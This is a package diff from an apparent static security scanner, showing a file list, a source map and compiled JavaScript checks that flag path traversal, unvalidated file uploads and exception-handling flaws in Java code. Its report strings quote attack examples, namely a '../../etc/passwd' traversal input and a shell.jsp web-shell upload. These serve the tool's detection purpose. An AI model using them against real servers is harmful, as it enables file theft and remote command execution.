  368. package/dist/src/lib/analyzers/typescript/security-checks/ai-generated-code.js +242 -0
  369. package/dist/src/lib/analyzers/typescript/security-checks/ai-generated-code.js.map +1 -0
  370. package/dist/src/lib/analyzers/typescript/security-checks/authentication.d.ts +28 -0
  371. package/dist/src/lib/analyzers/typescript/security-checks/authentication.d.ts.map +1 -0
  372. package/dist/src/lib/analyzers/typescript/security-checks/authentication.js +357 -0
  373. package/dist/src/lib/analyzers/typescript/security-checks/authentication.js.map +1 -0
  374. package/dist/src/lib/analyzers/typescript/security-checks/code-injection.d.ts +26 -0
  375. package/dist/src/lib/analyzers/typescript/security-checks/code-injection.d.ts.map +1 -0
  376. package/dist/src/lib/analyzers/typescript/security-checks/code-injection.js +380 -0
  377. package/dist/src/lib/analyzers/typescript/security-checks/code-injection.js.map +1 -0
  378. package/dist/src/lib/analyzers/typescript/security-checks/code-quality.d.ts +23 -0
  379. package/dist/src/lib/analyzers/typescript/security-checks/code-quality.d.ts.map +1 -0
  380. package/dist/src/lib/analyzers/typescript/security-checks/code-quality.js +109 -0
  381. package/dist/src/lib/analyzers/typescript/security-checks/code-quality.js.map +1 -0
  382. package/dist/src/lib/analyzers/typescript/security-checks/credentials-crypto.d.ts +21 -0
  383. package/dist/src/lib/analyzers/typescript/security-checks/credentials-crypto.d.ts.map +1 -0
  384. package/dist/src/lib/analyzers/typescript/security-checks/credentials-crypto.js +153 -0
  385. package/dist/src/lib/analyzers/typescript/security-checks/credentials-crypto.js.map +1 -0
  386. package/dist/src/lib/analyzers/typescript/security-checks/enhanced-supply-chain.d.ts +23 -0
  387. package/dist/src/lib/analyzers/typescript/security-checks/enhanced-supply-chain.d.ts.map +1 -0
  388. package/dist/src/lib/analyzers/typescript/security-checks/enhanced-supply-chain.js +146 -0
  389. package/dist/src/lib/analyzers/typescript/security-checks/enhanced-supply-chain.js.map +1 -0
  390. package/dist/src/lib/analyzers/typescript/security-checks/exception-handling.d.ts +23 -0
  391. package/dist/src/lib/analyzers/typescript/security-checks/exception-handling.d.ts.map +1 -0
  392. package/dist/src/lib/analyzers/typescript/security-checks/exception-handling.js +187 -0
  393. package/dist/src/lib/analyzers/typescript/security-checks/exception-handling.js.map +1 -0
  394. package/dist/src/lib/analyzers/typescript/security-checks/information-disclosure.d.ts +19 -0
  395. package/dist/src/lib/analyzers/typescript/security-checks/information-disclosure.d.ts.map +1 -0
  396. package/dist/src/lib/analyzers/typescript/security-checks/information-disclosure.js +97 -0
  397. package/dist/src/lib/analyzers/typescript/security-checks/information-disclosure.js.map +1 -0
  398. package/dist/src/lib/analyzers/typescript/security-checks/injection-attacks.d.ts +29 -0
  399. package/dist/src/lib/analyzers/typescript/security-checks/injection-attacks.d.ts.map +1 -0
  400. package/dist/src/lib/analyzers/typescript/security-checks/injection-attacks.js +319 -0
  401. package/dist/src/lib/analyzers/typescript/security-checks/injection-attacks.js.map +1 -0
  402. package/dist/src/lib/analyzers/typescript/security-checks/logging-failures.d.ts +21 -0
  403. package/dist/src/lib/analyzers/typescript/security-checks/logging-failures.d.ts.map +1 -0
  404. package/dist/src/lib/analyzers/typescript/security-checks/logging-failures.js +121 -0
  405. package/dist/src/lib/analyzers/typescript/security-checks/logging-failures.js.map +1 -0
  406. package/dist/src/lib/analyzers/typescript/security-checks/security-misconfiguration.d.ts +27 -0
  407. package/dist/src/lib/analyzers/typescript/security-checks/security-misconfiguration.d.ts.map +1 -0
  408. package/dist/src/lib/analyzers/typescript/security-checks/security-misconfiguration.js +213 -0
  409. package/dist/src/lib/analyzers/typescript/security-checks/security-misconfiguration.js.map +1 -0
  410. package/dist/src/lib/analyzers/typescript/security-checks/type-security.d.ts +19 -0
  411. package/dist/src/lib/analyzers/typescript/security-checks/type-security.d.ts.map +1 -0
  412. package/dist/src/lib/analyzers/typescript/security-checks/type-security.js +59 -0
  413. package/dist/src/lib/analyzers/typescript/security-checks/type-security.js.map +1 -0
  414. package/dist/src/lib/analyzers/typescript/type-checker.d.ts +17 -0
  415. package/dist/src/lib/analyzers/typescript/type-checker.d.ts.map +1 -0
  416. package/dist/src/lib/analyzers/typescript/type-checker.js +515 -0
  417. package/dist/src/lib/analyzers/typescript/type-checker.js.map +1 -0
  418. package/dist/src/lib/analyzers/typescript/utils/createVulnerability.d.ts +58 -0
  419. package/dist/src/lib/analyzers/typescript/utils/createVulnerability.d.ts.map +1 -0
  420. package/dist/src/lib/analyzers/typescript/utils/createVulnerability.js +71 -0
  421. package/dist/src/lib/analyzers/typescript/utils/createVulnerability.js.map +1 -0
  422. package/dist/src/lib/analyzers/typescript-analyzer.d.ts +116 -0
  423. package/dist/src/lib/analyzers/typescript-analyzer.d.ts.map +1 -0
  424. package/dist/src/lib/analyzers/typescript-analyzer.js +1660 -0
  425. package/dist/src/lib/analyzers/typescript-analyzer.js.map +1 -0
  426. package/dist/src/lib/security/compliance-mapping.d.ts +29 -0
  427. package/dist/src/lib/security/compliance-mapping.d.ts.map +1 -0
  428. package/dist/src/lib/security/compliance-mapping.js +1342 -0
  429. package/dist/src/lib/security/compliance-mapping.js.map +1 -0
  430. package/dist/src/lib/security/severity-scoring.d.ts +47 -0
  431. package/dist/src/lib/security/severity-scoring.d.ts.map +1 -0
  432. package/dist/src/lib/security/severity-scoring.js +965 -0
  433. package/dist/src/lib/security/severity-scoring.js.map +1 -0
  434. package/dist/src/lib/standards/references.d.ts +16 -0
  435. package/dist/src/lib/standards/references.d.ts.map +1 -0
  436. package/dist/src/lib/standards/references.js +1161 -0
  437. package/dist/src/lib/standards/references.js.map +1 -0
  438. package/dist/src/lib/types/index.d.ts +167 -0
  439. package/dist/src/lib/types/index.d.ts.map +1 -0
  440. package/dist/src/lib/types/index.js +3 -0
  441. package/dist/src/lib/types/index.js.map +1 -0
  442. package/dist/src/lib/utils/code-cleaner.d.ts +59 -0
  443. package/dist/src/lib/utils/code-cleaner.d.ts.map +1 -0
  444. package/dist/src/lib/utils/code-cleaner.js +283 -0
  445. package/dist/src/lib/utils/code-cleaner.js.map +1 -0
  446. package/package.json +51 -0
  447. package/src/commands/auth.ts +308 -0
  448. package/src/commands/config.ts +226 -0
  449. package/src/commands/init.ts +202 -0
  450. package/src/commands/scan.ts +238 -0
  451. package/src/config/config-loader.ts +175 -0
  452. package/src/reporters/cli-reporter.ts +282 -0
  453. package/src/scanner/local-scanner.ts +250 -0
  454. package/tsconfig.json +24 -0
  455. package/tsconfig.tsbuildinfo +1 -0
package/dist/src/lib/analyzers/java/security-checks/exception-handling.js.map ADDED
@@ -0,0 +1 @@
1
+ {"version":3,"file":"exception-handling.js","sourceRoot":"","sources":["../../../../../../../../src/lib/analyzers/java/security-checks/exception-handling.ts"],"names":[],"mappings":"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"}
package/dist/src/lib/analyzers/java/security-checks/file-operations.d.ts ADDED
@@ -0,0 +1,17 @@
1
+ /**
2
+ * File Operations Security Module
3
+ *
4
+ * Detects insecure file handling practices in Java source code including:
5
+ * - Path traversal vulnerabilities
6
+ * - File upload without validation
7
+ *
8
+ * OWASP A01:2021 - Broken Access Control
9
+ */
10
+ import { SecurityVulnerability } from '../../types';
11
+ /**
12
+ * Check for insecure file operations in Java code
13
+ * @param lines - Array of code lines to analyze
14
+ * @returns Array of security vulnerabilities found
15
+ */
16
+ export declare function checkFileOperations(lines: string[]): SecurityVulnerability[];
17
+ //# sourceMappingURL=file-operations.d.ts.map
package/dist/src/lib/analyzers/java/security-checks/file-operations.d.ts.map ADDED
@@ -0,0 +1 @@
1
+ {"version":3,"file":"file-operations.d.ts","sourceRoot":"","sources":["../../../../../../../../src/lib/analyzers/java/security-checks/file-operations.ts"],"names":[],"mappings":"AAAA;;;;;;;;GAQG;AAEH,OAAO,EAAE,qBAAqB,EAAE,MAAM,aAAa,CAAC;AAGpD;;;;GAIG;AACH,wBAAgB,mBAAmB,CAAC,KAAK,EAAE,MAAM,EAAE,GAAG,qBAAqB,EAAE,CA4E5E"}
package/dist/src/lib/analyzers/java/security-checks/file-operations.js ADDED
@@ -0,0 +1,67 @@
1
+ "use strict";
2
+ /**
3
+ * File Operations Security Module
4
+ *
5
+ * Detects insecure file handling practices in Java source code including:
6
+ * - Path traversal vulnerabilities
7
+ * - File upload without validation
8
+ *
9
+ * OWASP A01:2021 - Broken Access Control
10
+ */
11
+ Object.defineProperty(exports, "__esModule", { value: true });
12
+ exports.checkFileOperations = checkFileOperations;
13
+ const createVulnerability_1 = require("../utils/createVulnerability");
14
+ /**
15
+ * Check for insecure file operations in Java code
16
+ * @param lines - Array of code lines to analyze
17
+ * @returns Array of security vulnerabilities found
18
+ */
19
+ function checkFileOperations(lines) {
20
+ const vulnerabilities = [];
21
+ let inMultiLineComment = false;
22
+ lines.forEach((line, index) => {
23
+ const trimmed = line.trim();
24
+ const lineNumber = index + 1;
25
+ // Track multi-line comment blocks (/* ... */)
26
+ if (trimmed.includes('/*')) {
27
+ inMultiLineComment = true;
28
+ }
29
+ if (trimmed.includes('*/')) {
30
+ inMultiLineComment = false;
31
+ return;
32
+ }
33
+ // Skip comments and empty lines
34
+ if (!trimmed || inMultiLineComment || trimmed.startsWith('//') || trimmed.startsWith('*'))
35
+ return;
36
+ // 11. Path Traversal - HIGH
37
+ // FIX (Dec 9, 2025): Include FileInputStream/FileOutputStream, verify actual user input
38
+ const hasFileOperation = trimmed.match(/new\s+File\s*\(/) ||
39
+ trimmed.match(/Paths\s*\.\s*get\s*\(/) ||
40
+ trimmed.match(/new\s+FileInputStream\s*\(/) ||
41
+ trimmed.match(/new\s+FileOutputStream\s*\(/);
42
+ const hasUserInput = trimmed.includes('..') ||
43
+ (trimmed.includes('+') && trimmed.match(/["'].*\+\s*\w+|<brace>\w+\s*\+\s*["']/)) ||
44
+ trimmed.match(/request\s*\.\s*getParameter/);
45
+ if (hasFileOperation && hasUserInput) {
46
+ vulnerabilities.push((0, createVulnerability_1.createJavaSecurityVulnerability)('path-traversal', 'Path Traversal vulnerability detected', 'Validate file paths against whitelist and use Path.normalize() to prevent directory traversal', lineNumber, 'Unvalidated file paths with user input allow attackers to use directory traversal sequences (../) to access files outside the intended directory. This can expose sensitive system files, application configuration, source code, or other users\' data.', 'new File(basePath + userInput) where userInput = "../../etc/passwd" reads system password file', [
47
+ 'Sensitive file disclosure (/etc/passwd, config files)',
48
+ 'Source code exposure',
49
+ 'Application credential theft',
50
+ 'Information disclosure',
51
+ 'Arbitrary file read'
52
+ ], 'String filename = request.getParameter("file");\nFile file = new File("/uploads/" + filename); // Vulnerable\nFileInputStream fis = new FileInputStream(file);', 'String filename = request.getParameter("file");\nPath basePath = Paths.get("/uploads").toRealPath();\nPath filePath = basePath.resolve(filename).normalize();\nif (!filePath.startsWith(basePath)) {\n throw new SecurityException("Invalid path");\n}\nFile file = filePath.toFile();', 'Use Path.normalize() to resolve .. sequences, then validate the resulting path starts with your base directory. Alternatively, use a whitelist of allowed filenames'));
53
+ }
54
+ // 12. File upload without validation - HIGH
55
+ if (trimmed.match(/\.transferTo\s*\(/) || trimmed.match(/FileOutputStream\s*\(/)) {
56
+ vulnerabilities.push((0, createVulnerability_1.createJavaSecurityVulnerability)('file-upload-no-validation', 'File upload without proper validation detected', 'Validate MIME type, file extension, size limit, and sanitize filename before storage', lineNumber, 'Unvalidated file uploads allow attackers to upload malicious files like web shells (JSP, WAR), executables, or oversized files. If these files are stored in web-accessible directories or executed by the server, attackers can achieve remote code execution, denial of service, or data exfiltration.', 'Attacker uploads shell.jsp to /uploads/, then accesses http://server/uploads/shell.jsp to execute arbitrary commands', [
57
+ 'Remote Code Execution (web shell upload)',
58
+ 'Server compromise',
59
+ 'Denial of Service (large file upload)',
60
+ 'Stored XSS (malicious HTML/SVG)',
61
+ 'Path traversal via filename'
62
+ ], 'MultipartFile file = ...\nfile.transferTo(new File("/uploads/" + file.getOriginalFilename())); // No validation', 'MultipartFile file = ...\nString filename = file.getOriginalFilename();\n// Validate extension\nif (!filename.matches(".*\\\\.(jpg|png|pdf)$")) throw new SecurityException();\n// Validate MIME type\nif (!file.getContentType().startsWith("image/")) throw new SecurityException();\n// Validate size\nif (file.getSize() > 5_000_000) throw new SecurityException();\n// Sanitize filename\nString safeFilename = UUID.randomUUID() + ".jpg";\nfile.transferTo(new File("/uploads/" + safeFilename));', 'Validate file extension against whitelist, verify MIME type matches extension, enforce size limits, and use randomly generated filenames to prevent path traversal and overwrite attacks'));
63
+ }
64
+ });
65
+ return vulnerabilities;
66
+ }
67
+ //# sourceMappingURL=file-operations.js.map
package/dist/src/lib/analyzers/java/security-checks/file-operations.js.map ADDED
@@ -0,0 +1 @@
1
+ {"version":3,"file":"file-operations.js","sourceRoot":"","sources":["../../../../../../../../src/lib/analyzers/java/security-checks/file-operations.ts"],"names":[],"mappings":";AAAA;;;;;;;;GAQG;;AAUH,kDA4EC;AAnFD,sEAA+E;AAE/E;;;;GAIG;AACH,SAAgB,mBAAmB,CAAC,KAAe;IACjD,MAAM,eAAe,GAA4B,EAAE,CAAC;IACpD,IAAI,kBAAkB,GAAG,KAAK,CAAC;IAE/B,KAAK,CAAC,OAAO,CAAC,CAAC,IAAI,EAAE,KAAK,EAAE,EAAE;QAC5B,MAAM,OAAO,GAAG,IAAI,CAAC,IAAI,EAAE,CAAC;QAC5B,MAAM,UAAU,GAAG,KAAK,GAAG,CAAC,CAAC;QAE7B,8CAA8C;QAC9C,IAAI,OAAO,CAAC,QAAQ,CAAC,IAAI,CAAC,EAAE,CAAC;YAC3B,kBAAkB,GAAG,IAAI,CAAC;QAC5B,CAAC;QACD,IAAI,OAAO,CAAC,QAAQ,CAAC,IAAI,CAAC,EAAE,CAAC;YAC3B,kBAAkB,GAAG,KAAK,CAAC;YAC3B,OAAO;QACT,CAAC;QAED,gCAAgC;QAChC,IAAI,CAAC,OAAO,IAAI,kBAAkB,IAAI,OAAO,CAAC,UAAU,CAAC,IAAI,CAAC,IAAI,OAAO,CAAC,UAAU,CAAC,GAAG,CAAC;YAAE,OAAO;QAElG,4BAA4B;QAC5B,wFAAwF;QACxF,MAAM,gBAAgB,GAAG,OAAO,CAAC,KAAK,CAAC,iBAAiB,CAAC;YACjC,OAAO,CAAC,KAAK,CAAC,uBAAuB,CAAC;YACtC,OAAO,CAAC,KAAK,CAAC,4BAA4B,CAAC;YAC3C,OAAO,CAAC,KAAK,CAAC,6BAA6B,CAAC,CAAC;QAErE,MAAM,YAAY,GAAG,OAAO,CAAC,QAAQ,CAAC,IAAI,CAAC;YACvB,CAAC,OAAO,CAAC,QAAQ,CAAC,GAAG,CAAC,IAAI,OAAO,CAAC,KAAK,CAAC,uCAAuC,CAAC,CAAC;YACjF,OAAO,CAAC,KAAK,CAAC,6BAA6B,CAAC,CAAC;QAEjE,IAAI,gBAAgB,IAAI,YAAY,EAAE,CAAC;YACrC,eAAe,CAAC,IAAI,CAAC,IAAA,qDAA+B,EAClD,gBAAgB,EAChB,uCAAuC,EACvC,+FAA+F,EAC/F,UAAU,EACV,0PAA0P,EAC1P,gGAAgG,EAChG;gBACE,uDAAuD;gBACvD,sBAAsB;gBACtB,8BAA8B;gBAC9B,wBAAwB;gBACxB,qBAAqB;aACtB,EACD,gKAAgK,EAChK,yRAAyR,EACzR,qKAAqK,CACtK,CAAC,CAAC;QACL,CAAC;QAED,4CAA4C;QAC5C,IAAI,OAAO,CAAC,KAAK,CAAC,mBAAmB,CAAC,IAAI,OAAO,CAAC,KAAK,CAAC,uBAAuB,CAAC,EAAE,CAAC;YACjF,eAAe,CAAC,IAAI,CAAC,IAAA,qDAA+B,EAClD,2BAA2B,EAC3B,gDAAgD,EAChD,sFAAsF,EACtF,UAAU,EACV,0SAA0S,EAC1S,sHAAsH,EACtH;gBACE,0CAA0C;gBAC1C,mBAAmB;gBACnB,uCAAuC;gBACvC,iCAAiC;gBACjC,6BAA6B;aAC9B,EACD,iHAAiH,EACjH,2eAA2e,EAC3e,0LAA0L,CAC3L,CAAC,CAAC;QACL,CAAC;IACH,CAAC,CAAC,CAAC;IAEH,OAAO,eAAe,CAAC;AACzB,CAAC"}
package/dist/src/lib/analyzers/java/security-checks/framework-security.d.ts ADDED
@@ -0,0 +1,25 @@
1
+ /**
2
+ * Java Framework Security Detection Module
3
+ *
4
+ * This module detects framework-specific security vulnerabilities:
5
+ * - Log4j (CVE-2021-44228 Log4Shell) - checks #31-34
6
+ * - Spring Security - checks #27-30, #35
7
+ * - #27: Insecure CORS (@CrossOrigin with *)
8
+ * - #28: Path Traversal (@PathVariable with file operations)
9
+ * - #29: Missing Rate Limiting (authentication endpoints)
10
+ * - #30: Insecure Session Configuration (@RestController without STATELESS)
11
+ * - #35: Missing @EnableGlobalMethodSecurity
12
+ *
13
+ * Added: Phase 6 Week 2 Day 5 (2025-11-19)
14
+ * Updated: 2025-12-01 (added checks #27-30)
15
+ */
16
+ import { SecurityVulnerability } from '../../types';
17
+ /**
18
+ * Checks for Log4j and Spring Security vulnerabilities in Java code
19
+ *
20
+ * @param lines - Array of code lines to analyze
21
+ * @param code - Full code string (needed for multi-line checks)
22
+ * @returns Array of detected security vulnerabilities
23
+ */
24
+ export declare function checkFrameworkSecurity(lines: string[], code: string): SecurityVulnerability[];
25
+ //# sourceMappingURL=framework-security.d.ts.map
package/dist/src/lib/analyzers/java/security-checks/framework-security.d.ts.map ADDED
@@ -0,0 +1 @@
1
+ {"version":3,"file":"framework-security.d.ts","sourceRoot":"","sources":["../../../../../../../../src/lib/analyzers/java/security-checks/framework-security.ts"],"names":[],"mappings":"AAAA;;;;;;;;;;;;;;GAcG;AAEH,OAAO,EAAE,qBAAqB,EAAE,MAAM,aAAa,CAAC;AAIpD;;;;;;GAMG;AACH,wBAAgB,sBAAsB,CAAC,KAAK,EAAE,MAAM,EAAE,EAAE,IAAI,EAAE,MAAM,GAAG,qBAAqB,EAAE,CA0oB7F"}
package/dist/src/lib/analyzers/java/security-checks/framework-security.js ADDED
@@ -0,0 +1,396 @@
1
+ "use strict";
2
+ /**
3
+ * Java Framework Security Detection Module
4
+ *
5
+ * This module detects framework-specific security vulnerabilities:
6
+ * - Log4j (CVE-2021-44228 Log4Shell) - checks #31-34
7
+ * - Spring Security - checks #27-30, #35
8
+ * - #27: Insecure CORS (@CrossOrigin with *)
9
+ * - #28: Path Traversal (@PathVariable with file operations)
10
+ * - #29: Missing Rate Limiting (authentication endpoints)
11
